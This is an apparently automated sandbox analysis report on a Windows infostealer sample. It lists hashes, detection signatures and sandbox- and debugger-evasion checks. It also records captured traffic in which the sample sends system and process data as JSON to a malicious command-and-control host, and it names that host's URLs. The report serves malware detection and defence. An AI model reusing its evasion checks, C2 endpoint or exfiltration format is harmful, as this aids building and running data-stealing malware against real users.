Windows Analysis Report
jklg6EIhyR.exe

Overview

General Information

Sample name: jklg6EIhyR.exe (renamed because the original name is a hash value)
Original sample name: bec048b8a886ac4f2f72a47a41057f6d.exe
Analysis ID: 1580914
MD5: bec048b8a886ac4f2f72a47a41057f6d
SHA1: 19ad6894a66b4a5fec94097dc8e34ae6d599b1c2
SHA256: b791f8f262d7c1436a8132fdcc6b578095e490ad531600b829af4c9095d53955
Tags: exe, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • jklg6EIhyR.exe (PID: 6676 cmdline: "C:\Users\user\Desktop\jklg6EIhyR.exe" MD5: BEC048B8A886AC4F2F72A47A41057F6D)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: jklg6EIhyR.exe | Avira: detected
Source: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm17345798505a1 | Avira URL Cloud: Label: malware
Source: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850?argument=0 | Avira URL Cloud: Label: malware
Source: jklg6EIhyR.exe | Virustotal: Detection: 51%
Source: jklg6EIhyR.exe | ReversingLabs: Detection: 71%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: jklg6EIhyR.exe | Joe Sandbox ML: detected
Source: jklg6EIhyR.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: mov dword ptr [ebp+04h], 424D53FFh | 0_2_007DA5B0
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh | 0_2_007DA7F0 (2 occurrences)
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: mov dword ptr [edi+04h], 424D53FFh | 0_2_007DA7F0 (2 occurrences)
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: mov dword ptr [esi+04h], 424D53FFh | 0_2_007DA7F0 (2 occurrences)
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh | 0_2_007DB560
Source: jklg6EIhyR.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_0077255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_007729FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 | Host: httpbin.org | Accept: */*
Source: global traffic | HTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1 | Host: home.twentytk20ht.top | Accept: */* | Content-Type: application/json | Content-Length: 556460 | Data Raw (truncated in the report): 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 35 32 31 34 38 37 38 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 2 | Data Ascii (decoded from the hex dump, truncated where the dump is): { "ip": "8.46.123.189", "current_time": "1735214878", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 556 }, { "name": "services.exe", "pid": 624 }, { "name": "lsass.exe", "pid": 632 }, { "name": "svchost.exe", "pid": 748 }, { "name": "fontdrvhost.exe", "pid": 772 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "svchost.exe", "pid": 864 }, { "name": "svchost.exe", "pid": 912 }, { "name": "dwm.exe", "pid": 976 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 704 }, { "name
Source: global traffic | HTTP traffic detected: GET /TQIuuaqjNpwYjtUvFojm1734579850?argument=0 HTTP/1.1 | Host: home.twentytk20ht.top | Accept: */*
Source: global traffic | HTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1 | Host: home.twentytk20ht.top | Accept: */* | Content-Type: application/json | Content-Length: 31 | Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d | Data Ascii: { "id1": "0", "data": "Done1" }
Source: Joe Sandbox View | IP Address: 185.121.15.192
Source: Joe Sandbox View | IP Address: 34.226.108.155
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (8 occurrences)
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_0083A8C0 recvfrom
Source: global traffic | DNS traffic detected: DNS query: httpbin.org
Source: global traffic | DNS traffic detected: DNS query: home.twentytk20ht.top
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 NOT FOUND | Server: nginx/1.22.1 | Date: Thu, 26 Dec 2024 12:08:07 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 207 | Connection: close | Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a | Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 NOT FOUND | Server: nginx/1.22.1 | Date: Thu, 26 Dec 2024 12:08:09 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 207 | Connection: close | Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a | Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: jklg6EIhyR.exe, 00000000.00000003.1274897175.00000000074D0000.00000004.00001000.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://.css
Source: jklg6EIhyR.exe, 00000000.00000003.1274897175.00000000074D0000.00000004.00001000.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://.jpg
Source: jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFoj850
Source: jklg6EIhyR.exe, 00000000.00000003.1415306880.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1431509799.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
Source: jklg6EIhyR.exe, 00000000.00000003.1415306880.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1431509799.00000000017F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm17345798505a1
Source: jklg6EIhyR.exe, 00000000.00000002.1431540509.0000000001805000.00000004.00000020.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000003.1414692256.0000000001801000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850?argument=0
Source: jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850http://home.twentytk20ht.top/TQIuuaqjNpwY
Source: jklg6EIhyR.exe, 00000000.00000003.1274897175.00000000074D0000.00000004.00001000.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://html4/loose.dtd
Source: jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/hsts.html
Source: jklg6EIhyR.exe | String found in binary or memory: https://curl.se/docs/hsts.html#
Source: jklg6EIhyR.exe, jklg6EIhyR.exe, 00000000.00000003.1274897175.00000000074D0000.00000004.00001000.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: jklg6EIhyR.exe, 00000000.00000003.1274897175.00000000074D0000.00000004.00001000.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://httpbin.org/ip
Source: jklg6EIhyR.exe, 00000000.00000003.1274897175.00000000074D0000.00000004.00001000.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://httpbin.org/ipbefore
Source: unknown | Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49699

System Summary

Source: jklg6EIhyR.exe | Static PE information: section name: (blank)
Source: jklg6EIhyR.exe | Static PE information: section name: .idata
Source: jklg6EIhyR.exe | Static PE information: section name: (blank)
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_3_01863955 (12 occurrences)
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_007805B0
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_00786FA0
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_0083B180
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_007AF100
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_008400E0
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_00AFE030
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_007D6210
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_0083C320
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_00840420
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_00AC4410
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_0077E620
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_00AF4780
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_007DA7F0
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_00AD6730
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_0083C770
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_0077A960
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_00784940
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_0082C900
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_00946AC0
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_00A2AAC0
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_00AE8BF0
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_00A2AB2C
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_0077CBB0
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_00904B60
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_00AFCC70
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_00930D80
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_00AECD80
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_00AF4D40
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_00A8AE30
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_00794F70
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_0083EF90
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_00838F90
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_00AC2F90
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_007810E6
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_00ADD430
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_00AE35B0
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_00AC56D0
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_00B01780
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_00829880
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_00AC9920
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: String function: 007B4F40 appears 290 times
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: String function: 007B4FD0 appears 223 times
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: String function: 007775A0 appears 591 times
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: String function: 0094CBC0 appears 93 times
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: String function: 007773F0 appears 102 times
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: String function: 0078CCD0 appears 53 times
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: String function: 00927220 appears 96 times
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: String function: 0078CD40 appears 63 times
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: String function: 007771E0 appears 43 times
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: String function: 0077CAA0 appears 62 times
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: String function: 007B50A0 appears 83 times
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: String function: 008544A0 appears 59 times
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: String function: 007B5340 appears 41 times
Source: jklg6EIhyR.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: jklg6EIhyR.exe | Static PE information: Section: pfhmiofh ZLIB complexity 0.9944125996879334
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_0077255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_007729FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | File read: C:\Windows\System32\drivers\etc\hosts (4 occurrences)
Source: jklg6EIhyR.exe | Virustotal: Detection: 51%
Source: jklg6EIhyR.exe | ReversingLabs: Detection: 71%
Source: jklg6EIhyR.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: jklg6EIhyR.exe | String found in binary or memory: Unable to complete request for channel-process-startup
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Section loaded: napinsp.dll (2 occurrences)
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Section loaded: pnrpnsp.dll (2 occurrences)
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Section loaded: wshbth.dll (2 occurrences)
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Section loaded: nlaapi.dll (2 occurrences)
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Section loaded: winrnr.dll (2 occurrences)
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Section loaded: kernel.appcore.dll
Source: jklg6EIhyR.exe | Static file information: File size 4495872 > 1048576
Source: jklg6EIhyR.exe | Static PE information: Raw size of (blank-named section) is bigger than: 0x100000 < 0x283400
Source: jklg6EIhyR.exe | Static PE information: Raw size of pfhmiofh is bigger than: 0x100000 < 0x1c2a00

Data Obfuscation

Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Unpacked PE file: 0.2.jklg6EIhyR.exe.770000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pfhmiofh:EW;kvkhumva:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pfhmiofh:EW;kvkhumva:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: jklg6EIhyR.exe | Static PE information: real checksum: 0x453b38 should be: 0x44bd80
Source: jklg6EIhyR.exe | Static PE information: section name: (blank)
Source: jklg6EIhyR.exe | Static PE information: section name: .idata
Source: jklg6EIhyR.exe | Static PE information: section name: (blank)
Source: jklg6EIhyR.exe | Static PE information: section name: pfhmiofh
Source: jklg6EIhyR.exe | Static PE information: section name: kvkhumva
Source: jklg6EIhyR.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_3_0185D080 push eax; ret 0_3_0185D081
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_3_0187C109 push edx; ret 0_3_0187C83A (9 occurrences)
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_00AF41D0 push eax; mov dword ptr [esp], edx 0_2_00AF41D5
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_007F2340 push eax; mov dword ptr [esp], 00000000h 0_2_007F2343
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_0082C7F0 push eax; mov dword ptr [esp], 00000000h 0_2_0082C743
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_007B0AC0 push eax; mov dword ptr [esp], 00000000h 0_2_007B0AC4
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_007D1430 push eax; mov dword ptr [esp], 00000000h 0_2_007D1433
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_007F39A0 push eax; mov dword ptr [esp], 00000000h 0_2_007F39A3
Source: jklg6EIhyR.exe | Static PE information: section name: pfhmiofh entropy: 7.9553931910835605

Boot Survival

Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Window searched: window name: FilemonClass (2 occurrences)
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Window searched: window name: PROCMON_WINDOW_CLASS (3 occurrences)
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Window searched: window name: Filemonclass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\jklg6EIhyR.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: jklg6EIhyR.exe, 00000000.00000003.1274897175.00000000074D0000.00000004.00001000.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: PROCMON.EXE
Source: jklg6EIhyR.exe, 00000000.00000003.1274897175.00000000074D0000.00000004.00001000.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: X64DBG.EXE
Source: jklg6EIhyR.exe, 00000000.00000003.1274897175.00000000074D0000.00000004.00001000.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: WINDBG.EXE
